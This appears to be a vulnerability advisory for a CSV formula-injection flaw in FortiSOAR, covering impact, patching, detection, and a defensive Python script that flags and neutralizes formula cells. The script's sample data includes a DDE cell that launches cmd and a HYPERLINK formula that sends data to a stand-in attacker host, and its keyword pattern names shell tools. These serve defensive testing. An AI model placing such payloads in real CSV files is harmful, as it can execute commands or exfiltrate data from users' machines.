CVE-2024-47572

9.0 CRITICAL

📋 TL;DR

An improper neutralization of formula elements in a CSV file (CWE-1236) in Fortinet FortiSOAR lets an authenticated attacker execute arbitrary code. Cell values shaped like spreadsheet formulas (beginning with characters such as =, +, -, or @) are not neutralized when a crafted CSV is processed, so an attacker who can get such a file into the system can have its formula content executed. Organizations running FortiSOAR versions 7.2.1 through 7.4.1 are affected; version 7.4.2 fixes the issue.

💻 Affected Systems

Products:
  • Fortinet FortiSOAR
Versions: 7.2.1 through 7.4.1
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: All deployments with CSV import functionality enabled are vulnerable. The vulnerability exists in the CSV parsing mechanism.

📦 What is this software?

Fortinet FortiSOAR is a security orchestration, automation and response (SOAR) platform used by SOC teams to ingest alerts, manage incidents and run playbooks against connected security tools. Because it integrates with those tools through connectors, a compromise of the FortiSOAR host can reach well beyond the host itself.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining complete control over the FortiSOAR instance, potentially accessing sensitive security data and using the platform as a foothold into the network.

🟠

Likely Case

Unauthorized command execution leading to data exfiltration, lateral movement, or deployment of malware within the security operations environment.

🟢

If Mitigated

Limited impact due to network segmentation, strict file upload controls, and proper user access restrictions preventing malicious CSV uploads.

🌐 Internet-Facing: HIGH - on an internet-exposed instance, any account that can import CSV files (including one obtained through phishing or credential stuffing) provides a direct path to code execution.
🏢 Internal Only: MEDIUM - exploitation still requires an account with CSV import rights, so exposure is limited to internal users and any attacker who has already obtained such credentials.

🎯 Exploit Status

Public PoC: ❌ No
Weaponized: LIKELY (no public exploit known; assessment based on the low complexity once access is obtained)
Unauthenticated Exploit: ❌ No (authentication required)
Complexity: LOW

Exploitation requires the ability to get a CSV file into FortiSOAR, which typically means an authenticated account with import rights. The flaw is in how formula elements in cell values are handled, so once that access is obtained, crafting a working payload is straightforward. A practitioner caveat that applies to this weakness class in general (CWE-1236): formula-injection payloads fire wherever the CSV is interpreted as a spreadsheet or by a formula-evaluating parser, so CSV files exported from FortiSOAR should also be treated as untrusted input on analyst workstations.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.4.2 and later

Vendor Advisory: https://fortiguard.fortinet.com/psirt/FG-IR-24-210

Restart Required: Yes

Instructions:

1. Back up the FortiSOAR configuration and data.
2. Download FortiSOAR version 7.4.2 or later from the Fortinet support portal.
3. Follow Fortinet's upgrade documentation for your deployment type (appliance or virtual).
4. Apply the update and restart services.
5. Verify functionality after the upgrade.

🔧 Temporary Workarounds

Restrict CSV File Uploads


Temporarily disable or restrict CSV file upload functionality in FortiSOAR until patching can be completed.

Implement File Upload Validation


Add an external validation layer (for example, a pre-import script or an upload proxy) that rejects or neutralizes cells beginning with formula trigger characters (=, +, -, @, tab, carriage return) before the file reaches FortiSOAR.
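As an added example (not FortiSOAR code and not from the Fortinet advisory), the following Python script implements such a validation layer: it scans a CSV for cells that a spreadsheet or formula-aware parser would evaluate, reports them, and produces a neutralized copy by prefixing those cells with a single quote, following the OWASP CSV-injection guidance. The trigger characters, the keyword list, the function names and the embedded sample CSV are all assumptions constructed for this demo.

```python
import csv
import io
import re

# Leading characters that spreadsheet engines and formula-aware parsers treat as
# "this cell is a formula" (OWASP CSV-injection guidance). Assumption for the demo.
FORMULA_TRIGGERS = frozenset("=+-@\t\r")

# Fragments typical of weaponised formulas: DDE shell spawns, hyperlink/web-service
# exfiltration. Only reported for cells that already look like formulas, so a note
# that merely mentions "powershell" is not flagged.
SUSPICIOUS = re.compile(r"(?i)\b(cmd|powershell|mshta|dde|hyperlink|webservice|importxml)\b")

# Constructed sample input for the demo; not a real FortiSOAR export or import.
SAMPLE_CSV = (
    "id,name,note\n"
    "1,alice,=cmd|' /C calc'!A0\n"
    "2,bob,-12.5\n"
    "3,carol,@SUM(1+1)\n"
    "4,dave,+1+1\n"
    '5,eve," =HYPERLINK(""http://attacker.example/?""&A1)"\n'
)


def _looks_numeric(cell: str) -> bool:
    """Signed numbers start with - or + but are data, not formulas."""
    try:
        float(cell.strip())
        return True
    except ValueError:
        return False


def is_formula(cell: str) -> bool:
    """True when a spreadsheet would evaluate the cell rather than display it.

    Leading spaces are ignored because some importers trim them before parsing.
    """
    first = cell.lstrip(" ")
    if not first:
        return False
    return first[0] in FORMULA_TRIGGERS and not _looks_numeric(cell)


def scan_csv(text: str) -> list[dict]:
    """Return one finding per formula-looking cell; rows are 1-based data rows."""
    rows = list(csv.reader(io.StringIO(text)))
    if not rows:
        return []
    header, data = rows[0], rows[1:]
    findings = []
    for row_no, row in enumerate(data, start=1):
        for col_no, cell in enumerate(row):
            if not is_formula(cell):
                continue
            reasons = ["formula_trigger"]
            if SUSPICIOUS.search(cell):
                reasons.append("suspicious_keyword")
            col = header[col_no] if col_no < len(header) else f"col{col_no}"
            findings.append({"row": row_no, "col": col, "value": cell, "reasons": reasons})
    return findings


def neutralize_cell(cell: str) -> str:
    """Prefix a single quote so the cell is stored and displayed as text."""
    return "'" + cell if is_formula(cell) else cell


def neutralize_csv(text: str) -> str:
    """Rewrite a CSV so that no cell can be evaluated as a formula.

    The csv writer re-quotes fields, so embedded quotes and separators stay intact.
    """
    rows = list(csv.reader(io.StringIO(text)))
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    for idx, row in enumerate(rows):
        writer.writerow(row if idx == 0 else [neutralize_cell(c) for c in row])
    return out.getvalue()


if __name__ == "__main__":
    for f in scan_csv(SAMPLE_CSV):
        print(f"row {f['row']} col {f['col']}: {f['value']!r} -> {', '.join(f['reasons'])}")
    print(neutralize_csv(SAMPLE_CSV))
```

The numeric check keeps values like -12.5 from being flagged, and keyword hits are reported only for formula-shaped cells, so an analyst note that mentions "powershell" is not a false positive. Run it over files before they are imported, or over FortiSOAR CSV exports before they are opened in a spreadsheet.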

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate FortiSOAR from critical systems
  • Enforce least privilege access controls and audit all CSV file upload activities

🔍 How to Verify

Check if Vulnerable:

Check FortiSOAR version via web interface (Admin > System > About) or CLI command 'csadm --version'

Check Version:

csadm --version

Verify Fix Applied:

Confirm the running version is 7.4.2 or later, then import a test CSV (constructed yourself, in a non-production environment if possible) whose cells begin with =, +, -, and @ and check that the values are stored and displayed as literal text rather than evaluated.

📡 Detection & Monitoring

Log Indicators:

  • CSV imports from accounts, or at times, that do not match normal analyst activity
  • Imported CSV cells whose values begin with =, +, -, or @, especially those containing DDE, cmd, powershell, or HYPERLINK fragments
  • Unexpected process or command execution on the FortiSOAR host recorded in its logs
  • Failed CSV import attempts containing such content (an attacker testing payloads)

Network Indicators:

  • Unusual outbound connections from FortiSOAR system
  • Data exfiltration patterns

SIEM Query:

source="fortisoar" AND (csv_upload OR file_import) AND (error OR suspicious OR formula)

🔗 References

  • Fortinet PSIRT advisory FG-IR-24-210: https://fortiguard.fortinet.com/psirt/FG-IR-24-210
  • NVD entry for CVE-2024-47572: https://nvd.nist.gov/vuln/detail/CVE-2024-47572
